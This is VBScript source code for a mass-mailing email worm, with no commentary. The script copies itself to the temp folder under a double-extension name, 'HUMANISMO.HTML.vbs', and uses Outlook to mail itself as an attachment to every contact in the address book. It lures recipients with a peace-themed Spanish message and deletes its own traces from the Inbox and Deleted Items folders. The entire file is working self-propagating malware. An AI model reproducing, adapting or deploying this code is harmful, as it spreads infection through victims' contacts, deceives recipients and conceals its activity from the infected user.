ON ERROR RESUME NEXT
DIM FSO
DIM INF
DIM SCRIPTBUFFER
DIM OUTF
DIM FOLDER
DIM OUTLOOK
DIM MAPI
DIM LISTS
DIM LISTINDEX
DIM CONTACTCOUNT
DIM MAIL
DIM CONTACT
DIM COUNT
DIM ATTACHMENT
DIM CONT
DIM S
DIM T
DIM U
DIM I
SET FSO=CREATEOBJECT("SCRIPTING.FILESYSTEMOBJECT")
FOLDER=FSO.GETSPECIALFOLDER(2)
SET INF=FSO.OPENTEXTFILE(WSCRIPT.SCRIPTFULLNAME,1)
DO WHILE INF.ATENDOFSTREAM<>TRUE
 SCRIPBUFFER=SCRIPBUFFER & INF.READLINE & VBCRLF 
LOOP
SET OUTF=FSO.OPENTEXTFILE(FOLDER & "\HUMANISMO.HTML.vbs",2,TRUE)
OUTF.WRITE SCRIPBUFFER
OUTF.CLOSE
SET FSO=NOTHING 
SET FSO=CREATEOBJECT("SCRIPTING.FILESYSTEMOBJECT")
FOLDER=FSO.GETSPECIALFOLDER(2)
SET OUTLOOK=CREATEOBJECT("OUTLOOK.APPLICATION")
IF UCASE(OUTLOOK)="OUTLOOK" THEN
 SET MAPI=OUTLOOK.GETNAMESPACE("MAPI")
 SET LISTS=MAPI.ADDRESSLISTS
 FOR EACH LISTINDEX IN LISTS
  IF LISTINDEX.ADDRESSENTRIES.COUNT<>0 THEN
   CONTACTCOUNT=LISTINDEX.ADDRESSENTRIES.COUNT
   FOR COUNT =1 TO CONTACTCOUNT
    SET MAIL=OUTLOOK.CREATEITEM(0)
    SET CONTACT=LISTINDEX.ADDRESSENTRIES(COUNT) 
    MAIL.TO=CONTACT.ADDRESS
    MAIL.SUBJECT="HERMOSO DESEO"
    MAIL.BODY=VBCRLF & "HEY " & VBCRLF & VBCRLF & "OLVIDA LA GUERRA, ABRAZA LA PAZ" & VBCRLF & VBCRLF
    CONT=CONT+1
    SET ATTACHMENT=MAIL.ATTACHMENTS
    ATTACHMENT.ADD FOLDER & "\HUMANISMO.HTML.vbs"
    IF MAIL.TO <> "" THEN
     MAIL.SEND
    END IF
   NEXT
  END IF
 NEXT 
END IF  
KILL FOLDER & "\HUMANISMO.HTM.vbs"
SET S=CREATEOBJECT("OUTLOOK.APPLICATION")
SET T=S.GETNAMESPACE("MAPI")
SET U=T.GETDEFAULTFOLDER(6)
FOR I=1 TO U.ITEMS.COUNT
 IF U.ITEMS.ITEM(I).SUBJECT="HERMOSO DESEO" THEN  
   U.ITEMS.ITEM(I).DELETE  
 END IF
NEXT
SET U=T.GETDEFAULTFOLDER(3)
FOR I=1 TO U.ITEMS.COUNT
 IF U.ITEMS.ITEM(I).SUBJECT="HERMOSO DESEO" THEN  
   U.ITEMS.ITEM(I).DELETE   
 END IF
NEXT
